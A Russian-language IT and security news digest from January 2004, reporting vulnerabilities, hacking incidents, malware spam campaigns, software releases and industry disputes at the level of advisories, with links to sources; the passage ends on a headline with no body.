Около 17 тысяч паролей пользователей сети университета Миссури оказались под угрозой расшифровки в результате хакерского вторжения, сообщает информационное агентство UPI. 12 января университетская сеть в целях безопасности была полностью отключена от интернета. Всем пользователям было рекомендовано сменить пароли на более сложные. Представители ВУЗа сообщили, что обратились в ФБР с просьбой расследовать инцидент. В то же время в университете отметили, что зафиксированная хакерская атака является единственным происшествием такого рода, и была своевременно обнаружена с помощью антихакерского программного обеспечения. По словам руководителя отдела информационных технологий университета, хакер сумел получить в свое распоряжение зашифрованный файл с почтовыми паролями. Сведений о похищении других файлов у сотрудников ВУЗа нет.
Источник - http://www.viruslist.com

16/01/2004 11:03 ЦИК победил сотни хакеров в день парламентских выборов.
Сайт Центризбиркома РФ, на котором публиковались данные о результатах выборов в Госдуму, безуспешно пытались взломать более 900 раз. Об этом сообщил председатель ЦИКа Александр Вешняков, передает агентство РИА "Новости". "ЦИК оказался хакерам не по зубам", - заявил Вешняков. По словам главы Центризбиркома, хакерские атаки готовили не только любители, но и профессионалы, в том числе из других государств. Вешняков считает цель хакеров очевидной - "разрушить нашу систему обнародования информации". Систему ГАС "Выборы", которая используется для сбора, обработки и распространения информации о ходе выборов, председатель ЦИКа считает неуязвимой. По словам Вешнякова, ее невозможно взломать, поскольку она работает автономно и не подключена к Интернету. Вешняков сообщил, что Центризбирком ожидает новых хакерских атак на свой сайт во время президентских выборов и сейчас готовит меры по обеспечению безопасности.
Источник - http://www.lenta.ru

16/01/2004 10:29 Выход Mozilla 1.6.
Вчера вышел очередной (1.6) релиз популярного браузера на движке Gecko Mozilla. Улучшена работа почтового клиента (например, есть возможность удаления сообщений с сервера по прошествии определённого количества времени, поддержка бизнес-карт), введён механизм аутентификации NTLM, введена более тесная интеграция с Chatzilla, устранены различные уязвимости, обнаруженные в старой версии. Так что, качаем, пробуем, радуемся.
Подробности - http://www.mozilla.org/releases/mozilla1.6/

15/01/2004 16:28 PalmSource выпустил новую версию Palm OS.
Компания PalmSource выпустила очередную версию Palm OS 6.0 для нового поколения КПК и смартфонов, предназначенную для лицензиатов компании. Новое ПО поддерживает такие возможности, как мультизадачность, защиту памяти и структуры модульного проектирования, а также имеет лучшую защиту и поддержку мультимедиа. Разработчики смогут ближе познакомится с новой версией ОС на своей конференции Palm PalmSource, которая пройдет в следующем месяце. А очередной генеральный релиз ОС, по обещаниям её создателей, появится до конца этого года. Сама же Palm OS 6 станет частью новой архитектуры Mobile Business Architecture (MBA), известной под названием Sahara, о которой представители компании рассказали на прошлогодней выставке Cebit в США.
Источник - http://www.cnews.ru

15/01/2004 14:44 Уязвимость в tcpdump.
George Bakos обнаружил уязвимость в tcpdump - утилите мониторинга сетевого трафика (попросту сниффере). Возможность переполнения буфера была обнаружена в попрограмме декодирования протокола ISAKMP. Другой исследователь Jonathan Heusser обнаружил в этой же подпрограмме 2 дополнительные уязвимости. Используя эту уязвимость, удалённый атакующий может потенциально выполнить произвольный код в системе от имени пользователя "pcap", либо вызвать DoS сервера из-за входа tcpdump в бесконечный цикл. CERT выпущен соответствующий бюллетень с кодом CAN-2003-0989. Производители дистрибутивов Linux (RedHat, SuSe) выпустили обновления своих пакетов tcpdump.
Подробности - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0989

15/01/2004 14:15 Уязвимость в KDE.
Dirk Mueller от имени команды разработчиков KDE (популярной в мире открытых систем графической среды) сообщил о наличии уязвимости в одной из компонент KDE - просмотрщике VCF-информации файлов (VCF file information reader - в оригинале), который называется kdepim. Наличие уязвимости может теоретически позволить удалённому атакующему выполнить произвольный код в системе при просмотре специальным образом сформированного файла формата .VCF. Слово "теоретичеки" означает, что по умолчанию функция просмотра удалённых (remoute, в смысле, а не delete ;)) файлов не включена. Тем не менее, как обычно, остаётся возможность локального поднятия привилегий. Уязвимости подвержены пользователи версий KDE до 3.1.4 включительно. Командой выпущена версия 3.1.5, также доступен патч для обновления с 3.1.4. В качестве временной меры предосторожности можно удалить файл kfile_vcf.desktop.
Подробности - http://www.kde.org/info/security/advisory-20040114-1.txt

15/01/2004 12:20 Уязвимость в протоколе H.323.
CERT выпущен бююлетень по безопасности CA-2004-01, в котором описывается уязвимость в протоколе H.323, применяемом для организации видеоконференций и IP-телефонии (VoIP). Помимо этого уязвимости подвержены также всё ПО и "железки" (роутеры, файрволлы), которые поддерживают этот проткол, а также Session Initiation Protocol (SIP) и Media Gateway Control Protocol (MGCP). Кроме того, уязвимости подвержены также различные субпротоколы H.323, в частности, H.225.0. Об уязвимости сообщио координационный Центр безопасности национальной инфраструктуры Великобритании (NISCC), обнаруживший её совместно с группой исследователей компьютерной безопасности университета г.Оулу (OUSPG). Сама уязвимость кроется в субпротоколе H.225, который обеспечивает сетевое взаимодействие между H.323 - устройствами. Многие производители выпустили обновления для своего ПО, но в качестве превентивной меры рекомендуется применить фильтрацию трафика на порту 1720 TCP/UDP на граничных файрволлах. Помимо традиционной жертвы - Microsoft (об уязвимости в ISA-сервере мы писали вчера), пострадали такие зубры, как CISCO, Nortel, Tandberg, Avaya.
Подробности - http://www.cert.org/advisories/CA-2004-01.html

15/01/2004 12:03 Очередной маразм российского ведомства.
Тревожные тенденции, набирающие силу в последнее время, дали о себе знать пользователям интернета в России с неожиданной и без преувеличения экзотической стороны. Руководство Роскартографии в специальном пресс-релизе под названием "О размещении схем проезда в Интернете" от 24 ноября теперь уже прошлого, 2003 года довело до широких масс, что "размещение на корпоративных сайтах схем проезда с использованием в качестве основы фрагментов изданных карт и планов" чревато личным знакомством со статьей 146 УК РФ (Уголовный Кодекс Российской Федерации). Текст странного документа не замедлил привести ресурс ГИС-Ассоциации России. С ним, судя по не изменившемуся контенту многих сайтов, ознакомились еще не все. В то же время, здесь интересно все – и стиль, и претензионно выбранная цель первостепенной значимости. Документ интересен до слез. Трудно найти в Сети что-либо столь же невинное и одновременно столь же полезное, чем пресловутые "схемы проезда". Хорошо, пусть бы Роскартографию заинтересовали собственно географические карты – один из наиболее востребованных и представленных в Сети ресурсов вообще. Но нет, внимание привлекли именно "схемы проезда".
Подробности - http://www.cnews.ru/newcom/index.shtml?2004/01/15/153785

15/01/2004 11:39 Microsoft готовит новую версию пакета для обеспечения совместимости Windows и Unix.
Компания Microsoft готовит к выпуску новую версию пакета Services For Unix (SFU), сообщает "Компьюлента". Этот пакет предназначен для обеспечения совместимости компьютеров, работающих под управлением Windows и различных версий Unix и Linux, а также для облегчения миграции с Unix-подобных систем на решения Microsoft. Services For Unix представляет собой набор программных интерфейсов (API) ОС Unix, средств администрирования и разработки, которые могут работать на компьютерах под управлением Windows. В SFU 3.5 появятся целый ряд усовершенствований по сравнению с версией 3.0, выпущенной Microsoft в октябре 2001 года. В частности, значительно повысится производительность файловой системы NFS, службы Network Identity Service, программных интерфейсов Posix и других служб. Кроме этого, в новую версию SFU добавлена поддержка многопоточных приложений на базе технологии P-Threads, новые API и утилиты. Еще одной важной чертой Services For Unix 3.5 будет полная бесплатность - пакет можно будет скачать с сайта Microsoft.
Подробности - http://www.microsoft.com/windows/sfu/default.asp

15/01/2004 11:05 Очередная спам-рассылка трояна.
"Лаборатория Касперского" сообщает о зафиксированных фактов массовой спам-рассылки новой троянской программы, которая загружает и устанавливает в систему пользователя Интернет-червя Mimail.P. Заражённые письма имеют следующие данные: Отправитель: do_not_reply@paypal.com; Тема: PAYPAL.COM NEW YEAR OFFER; Текст начинается с заголовка "** GREAT NEW YEAR OFFER FROM PAYPAL.COM **". Письмо содержит вложенный файл paypal.exe (2Kb).
Источник - http://www.kaspersky.ru

14/01/2004 17:02 Уязвимости популярных антивирусов Linux.
Как сообщает dl на www.bugtraq.ru, Kaspersky AntiVirus for Linux, McAfee Virus Scan for Linux, Trend Micro InterScan VirusWall оказались уязвимыми к различным вариантам "bzip2-бомб" - относительно небольших специально подготовленных bzip2-архивов, которые распаковываются в несколько гигабайт, забивая файловую систему. В нижеприведённой ссылке приведены примеры бомб и история вопроса, производители извещены.
Подробности - http://www.aerasec.de/security/advisories/txt/bzip2bomb-antivirusengines.txt

14/01/2004 15:37 Сеть испанского университета едва не стала пиратским музыкальным сервером.
Уголовная полиция испанской провинции Понтеведра 13 января завершила операцию Snort, в ходе которой было задержано 14 человек, сообщает Europa Press. Все задержанные подозреваются в незаконном доступе к компьютерной сети университета города Виго. В числе преступлений, вменяемых жителям городов Барселона, Овьедо, А Корунья, Сан-Себастьян, - разглашение секретных сведений, преступления против интеллектуальной собственности и нанесение материального ущерба. У членов преступной группы изъят 41 компьютер, 12 принтеров, шесть сканеров и 13 модемов. Операция Snort была начата в конце июля прошлого года после двух незаконных вторжений в сети университета Виго и угроз в адрес представителей организаций, занимающихся вопросами распространения аудио и видеопродукции. Целью преступников было создание пиратского аудиовидеосервера на базе университета. Для проникновения в сеть хакеры использовали один из наиболее уязвимых компьютеров факультета химии. Максимальным наказанием для задержанных в случае признания их вины может стать лишение свободы сроком до 4 лет.
Источник - http://www.viruslist.com

14/01/2004 15:03 Управление трафиком в Linux.
Благодаря opennet.ru обнаружена очень интересная статья Ивана Песина "Повесть о Linux и управлении трафиком", в которой затрагивается тема возможностей и реализации системы управления трафиком в Linux. Замечательно описано как использовать такие системы, как CBQ, HTB, TBF, IMQ, алгоритмы управления очередью SFQ, ESFQ, RED.
Статья - http://gazette.linux.ru.net/rus/articles/taleLinuxTC.html

14/01/2004 14:57 Обнаружен крупнейший в России подпольный видеоцех.
Самый крупный в стране подпольный цех по производству видеопродукции "накрыли" оперативники Екатеринбургского управления по борьбе с экономическими преступлениями. Пиратское производство размещалось на территории овощебазы в пригороде Екатеринбурга и представляло собой гигантский, четко отлаженный и круглосуточно работающий механизм. Одновременно было задействовано около ста человек, которые переписывали записи с DVD-дисков на видеокассеты. В их распоряжении находилось более тысячи видеомагнитофонов и миллионы упаковок и голографических наклеек различных правообладателей. На момент захвата подпольного предприятия здесь обнаружили более 9 тысяч чистых видеокассет и 30 тысяч готовых к реализации записей фильмов. Арестован владелец черного бизнеса - 40-летний предприниматель. Ему следователи ГУВД Свердловской области инкриминируют, скорее всего, сразу две статьи Уголовного кодекса - незаконное предпринимательство и нарушение авторских прав.
Источник - http://www.cnews.ru

14/01/2004 14:39 Шароварщики проснулись: долгожданный ответ кракерам от Shareware!
Наконец-то пришли те времена, когда не только кракеры борятся за бесплатное ПО, но и когда авторы платного ПО по-настоящему борятся с кракерами их же собственными методами. Речь идет об услуге, недавно предложенной в русском сообществе авторов shareware (swrus.com). "Всего лишь" за $5 для вас изготовят крак или кейген, и, за дополнительную плату, добавят этот крак на 30/60/100 сайтов ($1 за сайт).
Суть заключается в том, что автор программы, пользуясь подобной услугой, получает для своей программы крак или кейген, который перестает работать через определенное время (например 5 дней) после установки. Тем самым, наличие двух-трех краков или кейгенов на варез сайтах означает, что другие кракеры уже не возьмутся ломать программу автора (ведь уже есть крак). С другой стороны, если программа хорошая, пользователь успеет привыкнуть к ней за 5 дней, и когда она перестанет работать, он скорее всего купит ее (речь идет о психологии американских пользователей).
Если этого недостаточно, то в swrus сообществе предлагается за $150-200 и более серьезная услуга – "создание крек групп под конкретную фирму, которые будут заниматься еще и маркетинговым продвижением в группах новостей, чатах, на сайтах и так далее".
Источник – аноним@mail.ru, по материалам рассылки swrus@yahoogroups.com

14/01/2004 11:44 SCO и Novell вынесли спор из избы.
SCO Group и Novell начали публикацию документов, относящихся к их спору об авторских правах на Unix — этот вопрос играет важную роль для успеха притязаний SCO на владение правами интеллектуальной собственности на операционную систему Linux. Документы SCO и Novell содержат подробности о сделке 1995 года, по которой Novell продала свой бизнес предшественнику SCO. Эти документы составляют основу теперешних претензий SCO на Linux и уверенности Novell в своей способности защитить заказчиков от судебного преследования со стороны SCO. SCO уверена, что код Unix незаконно перенесен в Linux, и требует, чтобы компании приобретали у нее лицензии. Novell опровергает это, утверждая, что ключевые права на Unix сохранились за ней, и предлагая юридическую защиту заказчикам, купившим ее продукт SuSE Linux. Теперь заинтересованные стороны могут изучить на веб-сайтах обеих компаний ключевой документ того контракта — «Соглашение о приобретении активов» от 1995 года. SCO опубликовала также пресс-материалы, выпущенные во время приобретения компанией активов у Novell. В их числе пресс-релиз, подтверждающий, что компания купила интеллектуальную собственность Unix вместе с бизнесом Unix и исходным кодом.
Подробности - http://zdnet.com.com/2100-1104_2-5140381.html

14/01/2004 11:20 Адриан Ламо признал себя виновным во взломе компьютеров New York Times.
В конце прошлой недели двадцатидвухлетний хакер Адриан Ламо признал себя виновным во взломе компьютерной сети издательства New York Times, сообщает "Компьюлента". При взломе компьютерных систем Ламо пользовался, в основном, интернет-браузером, сканируя сеть в поисках недокументированных веб-страниц. Зачастую системные администраторы не утруждают себя защитой секретной информации и ограничиваются лишь тем, что размещают ее по неизвестным адресам. Адриан Ламо взламывал системы множества компаний, однако в большинстве случаев пострадавшая сторона не подавала никаких жалоб, поскольку хакер информировал руководство о дырах в программном обеспечении и даже оказывал содействие в их устранении. Тем не менее, в New York Times сотрудничать с молодым человеком отказались и предпочли разбираться в суде. В результате, Ламо признал себя виновным по всем пунктам обвинения, заявив, что "перешел границу, которую не следовало пересекать". Приговор в отношении хакера должен быть вынесен 8 апреля нынешнего года.
Подробности - http://www.usatoday.com/tech/news/computersecurity...

14/01/2004 11:02 Как сохранить анонимность в Интернет.
На сайте журнала PC Magazine опубликована статья Шерил Кантер (автор и редактор PC Magazine) "Как сохранить анонимность". В статье довольно в общих чертах описывается механизм сохранения анонимности в Интернет, а также описанию работы переадресаторов. Конкретных данных там не очень много, но в качестве общего ликбеза статья вполне может быть рекомендована к ознакомлению.
Статья - http://pcmag.ru/default.asp?ID=312146

14/01/2004 10:42 Новые бюллетени по безопасности от Microsoft
Microsoft Открыла счёт бюллетеням по безопасности в наступившем году, выпустив сразу 3 бюллетеня с кодами MS04-001, MS04-002, MS04-003 (благоразумно оставив для номера узявимости в текущем году 3 знака ;)). Бюллетени посвящены описаниям уязвимостей в протоколе организации видеоконференц-связи H.323, пакете Exchange Server 2003, а также компоненте Microsoft Data Access (MDAC). Первая уязвимость получила рейтинг критической важности и требует немедленной установки патча. Проблема, как уже упоминалось, связана с протоколом H.323, который используется в сервисах передачи аудио и видео через интернет (VoIP). Для организации атаки злоумышленнику достаточно отправить сформированный определенным образом H.323-пакет, провоцирующий ошибку переполнения буфера. После этого на удаленной машине можно выполнить произвольный программный код. Дыра актуальна для приложений Microsoft Internet Security, Acceleration Server 2000, Microsoft Small Business Server 2000 и Microsoft Small Business Server 2003. Бюллетень MS04-002 описывает уязвимость в Microsoft Exchange Server 2003 и теоретически позволяет изменить привилегии доступа к чужим почтовым ящикам. Ошибка охарактеризована как умеренно опасная. Наконец, последняя дыра связана с компонентом MDAC, использующимся при выполнении операций с базами данных в Windows и SQL Server. Хакер может повысить свои права до уровня пользователя, который в данный момент работает с приложениями, эксплуатирующими MDAC. Уязвимость получила рейтинг важной.
MS04-001 - http://www.microsoft.com/technet/treeview/default.asp?...ms04-001.asp
MS04-002 - http://www.microsoft.com/technet/treeview/default.asp?...ms04-002.asp
MS04-003 - http://www.microsoft.com/technet/treeview/default.asp?...ms04-003.asp

13/01/2004 17:18 Microsoft продолжит поддерживать Windows 98 ради развивающихся стран.
Компания Microsoft выступила во вторник с официальным заявлением о том, что она продолжит поддерживать пользователей операционных систем Windows 98 и Windows 98 SE, передает Reuters. Это означает, что продолжится как выпуск основного программного продукта, так и всевозможных "заплаток" к нему. Первоначально предполагалось, что производство всех версий ОС до Windows 2000 будет остановлено в 2004 году. Сначала 16 января компания распрощалась бы с Windows 98 и Windows 98 SE, а 31 декабря - с Windows Millennium Edition (Me). Теперь эти сроки отодвинуты до 30 июня 2006 года. Смену курса Microsoft объяснил желанием помочь развивающимся странам. Именно в них компанию чаще всего обвиняли в том, что она вынуждает пользователей постоянно обновлять свое программное обеспечения, покупая все более и более дорогие версии. Кроме того, во многих странах начали переходить на бесплатную систему Linux с открытыми исходными кодами. Это заставило компанию также открыть некоторые коды, снизить цены для крупных клиентов и продолжать искать другие выходы.
Подробности - http://www.reuters.com/newsArticle.jhtml...

13/01/2004 16:32 Антивирус Касперского для Samba Server
"Лаборатория Касперского" представила новый продукт пятой серии популярных средств антивирусной защиты - Антивирус Касперского® 5.0 для Samba Server. Антивирус Касперского для Samba Server представляет собой решение для комплексной антивирусной защиты файловых Samba-серверов, работающих под управлением операционных систем Linux и FreeBSD. Отличающееся простотой установки и гибкостью настройки решение обеспечивает постоянный контроль над всеми операциями с расположенными на сервере объектами. Наличие постоянно активной антивирусной защиты при создании, открытии или модификации файлов надежно защищает хранящуюся на сервере информацию и снижает риск распространения вирусов в сети организации. Тем самым повышается надежность и эффективность функционирования всей корпоративной сети организации в целом. Всесторонняя безопасность защищаемого Samba-сервера достигается за счет сочетания передовых технологических разработок, обеспечивающих высокую производительность и постоянный мониторинг выполняемых в системе операций. Для предотвращения проникновения вредоносного кода и распространения эпидемии антивирусный комплекс функционирует в масштабе реального времени. Он эффективно блокирует зараженные объекты и вылечивает их, при этом уведомляя администратора о произошедшем инциденте.
Подробности - http://www.kaspersky.ru/news.html?id=145082395

13/01/2004 13:05 Microsoft готовит широкую агитационную кампанию против Linux.
Софтверный гигант Microsoft начал еще одну атаку на своего основного врага "номер два" - операционную систему с открытыми исходниками Linux. Как сообщают западные СМИ, компания собирается провести в ряде профессиональных ИТ-изданий, как бумажных, так и электронных, масштабную маркетинговую кампанию, в которой преимущества Windows будут расписаны в фактах и цифрах. Пока же на сайте компании опубликованы восемь причин, почему следует выбирать ее операционную систему.
Источник - http://www.compulenta.ru

13/01/2004 12:36 Linux для кассовых аппаратов.
До середины текущего года компании SUSE Linux AG и IBM приступят к совместной продаже решения, включающего основанную на Linux операционную систему для кассовых аппаратов, программное обеспечение автоматизации розничных магазинов, а также пакет специализированных услуг. Решение получило название IBM Retail Environment for SUSE Linux. Его основой является ОС на базе SUSE Linux Enterprise Server, оптимизированная для кассовых аппаратов IBM SurePOS, сертифицированная на совместимость с системами eServer и ПО промежуточного слоя IBM. Как сообщил представитель SUSE, этот специальный вариант SUSE Linux снабжен упрощенным инсталлятором, а также механизмами централизованного управления и развертывания, оптимизированными для применения в системах автоматизации розничной торговли.
Источник - http://www.cnews.ru

13/01/2004 12:08 Novell защитит пользователей Linux.
Компания Novell объявила о новой инициативе, в рамках которой пользователи операционной системы SuSE Enterprise Linux 8, купившие дистрибутив после 13 января 2004 года, могут рассчитывать на полную защиту от возможных судебных притязаний со стороны SCO, сообщает "Компьюлента". Руководство SCO, напомним, утверждает, что корпорация IBM незаконно открыла исходный код ОС Unix System V, в результате чего защищенная интеллектуальная собственность была позаимствована разработчиками сообщества open source. В настоящее время SCO требует от IBM выплаты компенсации в размере трех миллиардов долларов США, а от всех пользователей Linux с ядром 2.4 и выше - приобретения лицензий. Еще в конце сентября прошлого года корпорация Hewlett-Packard объявила о намерении взять на себя все возможные финансовые потери, связанные с использованием фирменных дистрибутивов Linux. Теперь с аналогичной инициативой выступила компания Novell, предлагая помощь покупателям SuSE Enterprise Linux 8.
Подробности - http://www.eweek.com/article2/0,4149,1434404,00.asp

13/01/2004 11:41 Хакерская группа Spykids атаковала южноафриканские сайты.
45 сайтов расположенных в Кейптауне южноафриканских компаний подверглись атаке хакерской группы Spykids, сообщает сайт газеты Cape Times. «В минувший четверг хакерская группа атаковала веб-сайты компаний в Кейптауне и Стелленбоше (Stellenbosch). То, что все атакованные объекты размещаются в одном районе, дает основание полагать о нападении хакеров на один сервер, через который в дальнейшем удалось получить доступ к указанным сайтам», — прокомментировал происшествие специалист в области компьютерного права Рейнхардт Байс (Reinhardt Buys). По мнению Байса, хакерская атака была организована за пределами ЮАР. В качестве наиболее вероятного места проживания компьютерных преступников юрист называет Бразилию. В прошлом году сайты южноафриканских компаний и ведомств подвергались хакерским атакам в среднем 70 раз в день. Рекордный показатель активности киберпреступников был зафиксирован 22 мая, когда число атак достигло 105. В связи с предпринимаемыми мерами безопасности ежедневное число хакерских атак в ЮАР значительно снизилось и теперь составляет около 17.
Источник - http://www.viruslist.ru

13/01/2004 10:36 ПО блокирует изображение денег.
По просьбе международной банковской организации в целях борьбы с фальшивомонетчиками пользователи Photoshop и Paintshop Pro больше не смогут открывать изображения многих валют. Adobe и другие производители ПО для работы с изображениями, исполняя волю группы национальных банков, установили в свои программы секретную технологию для борьбы с подделкой денег. Их программы больше не смогут открывать файлы, содержащие изображение валют нескольких стран. По словам директора по продуктам Adobe Кевина Коннора, код для обнаружения таких изображений поступил от Central Bank Counterfeit Deterrence Group (CBCDG), малоизвестной организации, представляющей национальные банки Бельгии, Канады, Франции, Германии, Италии, Японии, Нидерландов, Швеции, Швейцарии, Великобритании и США. Он не смог назвать защищаемые валюты, но пользователи Adobe Photoshop CS и Jasc Paintshop Pro жалуются, что файлы с изображением новых 20-долларовых купюр и нескольких видов купюр евро не открываются. Более того, Коннор утверждает, что в большинство цветных принтеров уже встроена та же технология. Ее создатель, компания Digimarc, подтверждает, что код разработан по заказу банковской группы, но детали не раскрывает. CBCDG основана в 1993 году руководителями центробанков десяти стран. Группа, первоначально называвшаяся SSG-2, должна была разработать систему компьютерной идентификации подделок. В 2003 году США выделили на эту программу 2,9 млн долл. Агентом ассоциации по заключению контрактов является Банк международных расчетов (БМР). Еще в начале 2000 года CBCDG начала обращаться к компаниям, производящим программы для работы с изображениями, а также цветные принтеры, с просьбой включить в свои продукты технологию против фальшивок. Кроме того, Европейский центральный банк попросил Европейскую комиссию разработать законодательство, которое требовало бы обязательного применения такой технологии.
Подробности - http://news.zdnet.co.uk/software/applications/0,39020384,39119018,00.htm

13/01/2004 10:12 Крупнейшие хайтек-компании создали фонд для защиты пользователей Linux.
Высокотехнологические компании, входящие в некоммерческий консорциум Open Source Development Labs (OSDL), создали специальный фонд для оплаты расходов по судебным разбирательствам, в которые втянуты пользователи операционной системы Linux. Как говорится в пресс-релизе на сайте OSDL, в распоряжение фонда уже поступило около трех миллионов долларов, всего же планируется собрать до 10 миллионов. В числе компаний, предоставивших свои средства, - Intel и IBM. В первую очередь средства фонда пойдут на оплату юридических услуг, которыми пользуется IBM в тяжбе с компанией SCO Group, выпускающей операционную систему Unix.
Подробности - http://www.osdl.org/newsroom/press_releases/2004/2004_01_12_beaverton.html

12/01/2004 14:16 Ура, товарищи! Microsoft выпущена утилита для удаления Blaster!
Как говорится, не прошло и года, как Microsoft выпустила утилиту для удаления червя Blaster, основательно попортившего нервы системным администраторам в августе минувшего года. Что примечательно, компанией Symantec подобная утилита была выпущена ещё в сентябре (FixBlast). Кроме того, Blaster довольно успешно определяется и вычищается всеми антивирусными пакетами. Удивительная оперативность господ из Рэдмонда! Обращает внимание, что утилита выпущена 31 декабря.
Подробности - тута

12/01/2004 13:24 Образы FreeBSD 5.2 доступны для скачивания!
Как сообщает opennet.ru, образы дисков FreeBSD 5.2-Release доступны на ftp://ftp.freebsd.org и зеркалах. Официальный анонс о выпуске новой версии этой популярной ОС ожидается в ближайшие дни, сообщает freebsdaddicts.org. Эта новость является вдвойне знаменательной, ибо является ПЯТИТЫСЯЧНОЙ! С чем мы сами себя и поздравляем!:))
Образы дисков - ftp://ftp.freebsd.org/pub/FreeBSD/ISO-IMAGES-i386/5.2

12/01/2004 12:31 UA-net будут сертифицировать.
С 2006 года на Украине планируется ввести сертификацию электронных информационных ресурсов. В их число попадают все сайты в украинском сегменте сети Интернет. Как сообщает "УФС", сертификация предусмотрена мероприятиями по реализации Концепции формирования системы национальных электронных информационных ресурсов, утвержденными распоряжением Кабинета Министров от 31 декабря 2003 г. N828-р. Согласно плану мероприятий, уже до конца 2004 г. в Украине должен быть создан реестр национальных электронных информационных ресурсов. В Концепции раскрыто понятие "национальные ресурсы". К ним причисляются "ресурсы независимо от их содержания, формы, времени и места создания, формы собственности, предназначенные для удовлетворения потребностей гражданина, общества, государства. Национальные ресурсы включают государственные, коммунальные и частные ресурсы". Таким образом, "национальными электронными информационными ресурсами" можно считать абсолютно все сайты в украинском сегменте Интернета. Хотя, вопрос о том, какие сайты считать принадлежащими к Уанету - довольно спорный.
Источник - http://www.runet.ru

12/01/2004 12:05 Спамеров намерены бить законом "О рекламе".
Для борьбы со спамом нужно определиться - к какому роду деятельности его можно отнести. Поскольку несанкционированная рассылка, как правило, носит рекламный характер, - опекаться этой проблемой в РФ должно МАП. Вопросу законодательной борьбы со спамом был посвящен доклад членов Рабочей группы Проекта «АнтиСпам» на V Международной конференции «Право и Интернет», прошедшей в ноябре 2003 года. Согласно федеральному закону «О рекламе», государственный контроль в области рекламы возложен на Министерство по антимонопольной политике и поддержке предпринимательства. В МАП было направлено заявление Рабочей группы Проекта «АнтиСпам» о нарушении ФЗ со стороны одного из самых одиозных спамеров Рунета – т.н. «Российской информационной сети». В заявлении был указан ряд признаков, по которым произошло нарушение закона, а именно: «скрытая реклама», «недостоверная реклама», «заведомо ложная реклама», «неэтичная реклама» и др.
Подробности - http://www.ifap.ru/pr/2004/040112a.htm

12/01/2004 11:31 Израильские хакеры проникли в систему Почтового банка.
Полиция Хайфы раскрыла преступную группировку, члены которой, согласно подозрению, сумели проникнуть в компьютерную сеть Почтового банка и перевести сотни тысяч шекелей на счета фиктивных клиентов в этом же банке. Все началось в декабре, когда неизвестные взломали отделение Почтового банка в Хайфе, однако ничего не взяли. Через некоторое время работники банка обнаружили, что на счета, открытые в последнее время, переводятся крупные суммы, а затем снимаются клиентами. Выяснилось, что распоряжения о переводе поступают с компьютера, находящегося во взломанном ранее отделении банка. Проверив этот компьютер, полиция обнаружила в нем установленное электронное устройство, при помощи которого компьютеру передавались указания на финансовые операции со счетами. Также выяснилось, что это электронное устройство позволяет войти в любой компьютер любого отделения банка и виртуальным образом переводить деньги со счета на счет, что подозреваемые и делали, используя переносной компьютер. На сегодняшний день арестовано трое подозреваемых по этому делу: две женщины и мужчина. Каждый из них перевел на фиктивные счета десятки тысяч шекелей и был арестован в момент снятия денег в различных отделениях банка.
Подробности - http://www.securitylab.ru

12/01/2004 11:14 Бета-версия 64-разрядной Windows Server 2003 Enterprise Edition.
На прошлой неделе компания Microsoft представила бета-версию 64-разрядной операционной системы Windows Server 2003 Enterprise Edition. Этот релиз предназначен исключительно для клиентов компании по программе CPP (Customer Preview Program). Размер дистрибутива составляет 550 Мб. Как сообщается на сайте Microsoft, Windows Server 2003, Enterprise Edition, for 64-Bit Extended Systems предназначена исключительно для систем на базе 64-разрядных процессоров AMD Opteron. Обладателям же Intel Itanium придется еще ждать своего часа. Тестовая версия 64-разрядной Windows Server 2003 Enterprise Edition может работать на системах, содержащих до восьми процессоров AMD Opteron и оперативной памятью до 64 гигабайт. Срок действия ПО - один год со дня активации. Окончательный релиз 64-разрядной системы запланирован на вторую половину 2004 года.
Источник - http://www.compulenta.ru

12/01/2004 10:46 Почтовый сервер, маршрутизатор и брандмауэр на Linux.
Молодая тайваньская компания IEI Electronics разработала компактный Linux-компьютер WMS-2208R, объединяющий в десктоп-корпусе почтовый сервер, маршрутизатор, восьмипортовый роутер, принт-сервер, брандмауэр и ориентированный на применение в малом и среднем бизнесе, cообщает "Компьюлента". В IEI Electronics считают, что их новинка будет востребована компаниями, предпочитающими иметь собственную почтовую систему, а не пользоваться той, что предоставляет их интернет-провайдер. Центральным процессором в сервере является Geode GX1 от компании National Semiconductor. Он обладает архитектурой, совместимой с x86, и работает на номинальной частоте 300 МГц. Все программное обеспечение умещается в 32-мегабайтной флэш-памяти, объем оперативной памяти составляет 128 Мбайт. Для хранения писем предусмотрены два 3,5-дюймовых отсека, куда можно подключить винчестеры общим объемом до 400 Гбайт. Почтовая часть сервера поддерживает стандарты POP3, SMTP, MAP4 и MIME. Владельцы почтовых ящиков могут самостоятельно настраивать антиспамовые фильтры, форвардинг, автоответчик и т.д. WMS-2208R можно управлять через веб-интерфейс, SNMP или с помощью небольшого встроенного ЖК-экрана.
Подробности - http://www.ia.ieiworld.com/products/webmail/wms-2208r/wms2208r.asp

11/01/2004 15:58 Выход электронного журнала "Спамтест" No. 31.
Российское сообщество борьбы со спамом выпустило очередную версию своего еженедельного журнала "Спамтест" No. 31. Номер в основном посвящён новостям, видно, господа из противоспамовой компании (впрочем, судя по логам почтового сервера,равно как и сами спамеры) отдыхали после Нового Года.
Журнал - http://www.kaspersky.ru/news.html?id=145010107

11/01/2004 14:43 Поддержка Windows 98 перемещается на CD.
В ближайшую пятницу, после того как Microsoft прекратит поддержку Windows 98, она предложит бесплатный CD, помогающий пользователям «выжать максимум» из устаревающей операционной системы без какого-либо дополнительного содействия со стороны софтверного гиганта. Спустя шесть лет после выпуска операционной системы Windows 98 с ней все еще работает примерно четверть веб-сёрферов. В прошлом году Microsoft объявила, что она прекратит поддержку Windows 98 с 15 января, так что миллионы пользователей скоро останутся беззащитными перед новыми эксплойтами и вновь обнаруживаемыми уязвимостями. Ларс Алгрен, старший менеджер по маркетингу Microsoft, сообщил ZDNet UK, что CD, разработанный софтверным гигантом совместно с фирмой Future Publishing, будет содержать рекомендации, техническую информацию и избранные статьи из базы знаний. Все это будет опубликовано также на веб-сайтах технической поддержки Microsoft. Он признал также, что Microsoft не хочет обнадеживать пользователей Windows 98, чтобы в том случае, если обнаружится серьезный пробел в защите и компания решит выпустить поправку, они были приятно удивлены. Те пользователи, которым нужно установить последние поправки для Windows 98, пока могут сделать это через службу Windows Update, но что будет с ней дальше, не ясно.
Подробности - http://zdnet.com.com/2100-1104_2-5138328.html

10/01/2004 16:05 Mimail продолжает беспокоить пользователей.
